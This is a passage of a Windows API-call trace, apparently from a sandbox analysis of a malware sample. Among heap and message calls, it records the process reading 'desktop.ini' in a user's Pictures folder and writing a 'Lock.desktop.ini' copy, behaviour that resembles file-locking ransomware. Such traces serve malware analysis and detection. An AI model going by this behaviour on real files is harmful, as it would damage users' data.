lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0254.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0254.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0254.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0254.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0254.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0254.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0254.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0254.763] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.763] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.763] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.763] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0254.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0254.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0254.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0254.764] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0254.764] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.764] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0254.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0254.765] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0254.765] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.765] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0254.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0254.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0254.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0254.766] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/Lock.desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lock.desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0254.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0254.766] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0254.767] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.767] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0254.767] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0254.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0254.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0254.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0254.767] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0254.767] ReadFile (in: hFile=0x1f8, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x1f8, lpOverlapped=0x0) returned 1 [0254.768] ReadFile (in: hFile=0x1f8, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0254.768] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0254.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0254.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0254.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0254.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0254.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1f8) returned 0x24f3fc8 [0254.769] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0254.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0254.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0254.769] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0254.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0254.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0254.769] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0254.769] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0254.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0254.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0254.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0254.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0254.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0254.769] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0254.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0254.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0254.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0254.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0254.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0254.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0254.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0254.770] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0254.770] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0254.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0254.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0254.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0254.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0254.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0254.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0254.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0254.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0254.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0254.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0254.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0254.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0254.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0254.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0254.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0254.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0254.771] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0254.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0254.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0254.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0254.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0254.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0254.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0254.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0254.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0254.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0254.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0254.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0254.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0254.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0254.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0254.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0254.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0254.772] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0254.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0254.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0254.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0254.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0254.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0254.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0254.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0254.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0254.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0254.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0254.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0254.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0254.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0254.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0254.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0254.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0254.773] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0254.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0254.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0254.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0254.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0254.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0254.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0254.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0254.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0254.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0254.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0254.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0254.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0254.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0254.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0254.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0254.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0254.774] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0254.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0254.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0254.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0254.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0254.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0254.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0254.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0254.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0254.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0254.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0254.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0254.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0254.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0254.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0254.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0254.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0254.774] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0254.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0254.775] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0254.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0254.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0254.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8c0 [0254.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0254.775] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0254.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0254.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0254.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0254.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0254.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0254.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0254.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0254.775] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0254.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0254.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0254.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0254.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0254.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0254.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0254.776] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0254.776] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0254.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0254.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0254.776] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0254.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0254.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9708 [0254.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d978 [0254.776] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0254.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0254.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0254.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0254.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0254.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0254.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0254.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0254.777] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0254.777] HeapFree (in: 